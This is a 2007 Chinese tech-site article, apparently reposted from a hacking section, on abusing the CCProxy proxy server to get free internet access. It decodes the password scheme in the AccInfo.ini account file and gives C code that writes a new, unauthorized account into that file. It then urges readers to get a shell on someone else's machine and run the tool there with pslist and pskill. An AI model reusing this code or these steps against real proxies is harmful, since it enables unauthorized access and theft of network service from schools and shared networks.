网络通信 频道
IT168首页 > 网络通信 > 网络通信应用 > 正文

黑客小技巧,用CCproxy漏洞实现免费上网

作者:协议分析网 编辑: 王炯 2007-06-26 00:00
分享

 最近网络太乱啦,都不不怎么说,艾!不过最近漏洞出来的也不少,就光光MS都出来一大堆,呵呵,就连一个代理的小小软件都会有漏洞,呵呵!有漏洞就好,大家可以玩玩嘛!刚刚出来了个isno大哥发现的Ccproxy漏洞,goldsun写出来的软件Ccpxdown.exe的软件,有的玩,呵呵,不过今天我要写的不是这个,是我自己发现的一些东西,其实没什么技术性!
  大家都知道ccproxy这个小软件吧!这个软件在我们学校比较流行,用代理的,基本上都是这个,呵呵,估计大家所在的学校和小区的局域网也是一样吧!那今天就让我给大家介绍这个软件:
  大家打开ccproxy的目录,只要大家以前配置个帐户,那么在其下面就会有个AccInfo.ini的文件,这个就是帐户配置文件,现在给大家分析一下:
  首先让大家看看一个典型的AccInfo.ini文件,代码如下:
  [System]
  UserCount=3  -----------这里是帐户的个数
  AuthModel=1  ----------1代表允许部分
  AuthType=2  ---------允许的连接模式的个数
  TimeScheduleCount=0
  WebFilterCount=0
  [User001]
  UserName=User-001
  Password=
  MACAddress=
  IPAddressLow=219.216.100.1
  IPAddressHigh=219.216.100.1
  ServiceMask=254
  MaxConn=-1
  BandWidth=-1
  WebFilter=-1
  TimeSchedule=-1
  EnableUserPassword=0
  EnableIPAddress=1
  EnableMACAddress=0
  [User002]
  UserName=User-001
  Password=898884883
  MACAddress=
  IPAddressLow=0.0.0.0
  IPAddressHigh=0.0.0.0
  ServiceMask=254
  MaxConn=-1
  BandWidth=-1
  WebFilter=-1
  TimeSchedule=-1
  EnableUserPassword=1
  EnableIPAddress=0
  EnableMACAddress=0
  大家看到上面注释的部分了吗?
  我要修改的也是这个地方!先来解释这个[AuthType=2  ----的接模式的个数]这里假如你的CCPROXY只用一种验证模式,那么它就是1,假如你还有其他验证模式,比如用户/密码,MAC地址,...,的话那么Auth Type就会变化使等他的数字与你的验证模式种类数相同!
  经过我做实验知道,只要我们修改:UserCount=3 AuthModel=1 AuthType=2这三个地方,还有在下面在添加一些代码,那么重起CCPROXY后,帐户就会添加成功了!但是大家要注意到这些地方,想[User-00x]的地方,有多少个用户,[User-00x]中的x就是多少,否则将会失败!还有就是假如我们添加代码成功后,必须重启动CCPROXY,我们添加的帐户才会生效!
  好了现在我们来添加代码,我们要在CCPROXY里新增一个新的用户,那么我们就可以在后添加上如下代码:
  [User00x]
  UserName=User-001
  Password=898884883
  MACAddress=
  IPAddressLow=0.0.0.0
  IPAddressHigh=0.0.0.0
  ServiceMask=254
  MaxConn=-1
  BandWidth=-1
  WebFilter=-1
  TimeSchedule=-1
  EnableUserPassword=1
  EnableIPAddress=0
  EnableMACAddress=0
  这段代码是什么意思呢?EnableUserPassword=1-----表示以用户/密码的验证模式;
  EnableIPAddress=0----------0表示不是这种模式,也就是不是IP地址验证模式;
  EnableMACAddress=0----------0表示不是这种模式,也就是不是MAC地址验证;当然还有很多种,我就不一一介绍了!
  UserName=User-001----------------用户名!
  Password=898884883----------------密码!
  那898 884 883表示什么呢?它表示的就是est!
  我现在列举一些例子:
  1------950
  2------949
  
  9------942
  a------902
  A------934
  a ------902
  b ------901
  c ------900
  d ------899
  z ------877
  大家看到这些应该知道了吧!950代表1,949代表2,依次递减!
  902代表a,901代表b,依次递减,大写的字母比小写字母大32;
  现在你就知道898884883代表的是est了吧!呵呵,大家也可以自己配置!
  好了说到这里,我们的发现的介绍也就基本完了!
  那么我们如果程序来添加一个新的帐户呢?(下面是我自己写的C代码,代码都没有进行任何的优化,希望大家不要笑)
  #include
  main()
  {int c=0,user,model,i;
  FILE*fp;
  clrscr();
  fp=fopen("AccInfo.ini","r+");
  while(c!=44)
  {getc(fp);
  c++;
  if(c==19){ user=getc(fp);
  printf("\nthe total user is:%c\n",user);
  }
  if(c==41){ model=getc(fp);
  printf("\nthe curent model is:%c\n",model);
  
  }
  }
  fseek(fp,20,0);
  putc(++user,fp);
  fseek(fp,45,0);
  putc(++model,fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r");
  c=0;
  while(c!=44)
  {putchar(getc(fp));
  c++;
  }
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("[User004]\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("UserName=User-001\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("Password=898884883\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("MACAddress=\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("IPAddressLow=0.0.0.0\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("IPAddressHigh=0.0.0.0\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("ServiceMask=254\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("MaxConn=-1\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("BandWidth=-1\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("WebFilter=-1\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("TimeSchedule=-1\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("EnableUserPassword=1\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("EnableIPAddress=0\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,0,2);
  fputs("EnableMACAddress=0\n",fp);
  fclose(fp);
  fp=fopen("AccInfo.ini","r+");
  fseek(fp,-237L,2);
  putc(user,fp);
  fclose(fp);
  }
  用TC或者VC都能编译出来!
  编译出来后大家可以放到CCPROXY的目录下运行,看看是不是多了个新的帐户!验证形式:用户/密码
  用户名:User-001
  密码 :est
  其实作者本来设想的这个小东西应该具有如下功能的:
  搜索系统进程中是否有CCPRXOY,如果没有提示错误!
  并搜索CCPROXY所在的目录,
  杀死Ccproxy
  添加帐户;
  在重起CCproxy
  但是现在作者只写出了添加帐户的代码,其他的没时间去写了!大家可以自己发挥!剩余的代码,实现免费上网已经不是什么难题了!
  其实,大家想玩的话,不用我告诉你方法你都知道,只要大家拿到对方的一个shell上传到对方的 CCPOXY目录运行,结和pslist.exe和pskill.exe,也能先来玩玩!

文章转载地址:http://www.cnpaf.net/Class/hack/06101110492227926645.html

0
相关文章
    盛拓传媒简介 关于IT168 广告服务 使用条款 投稿指南 联系我们
    北京盛拓优讯信息技术有限公司. 版权所有 中华人民共和国增值电信业务经营许可证 编号:京B2-20170206 北京市公安局海淀分局网监中心备案编号:11010802020118
    广播电视节目制作经营许可证:(京) 字第25315号 信息系统安全等级保护备案:11010813655-00001 京公网安备11010802020118号
    违法和不良信息举报电话 :010-58859066,18101376593,shengtuo20@it168.com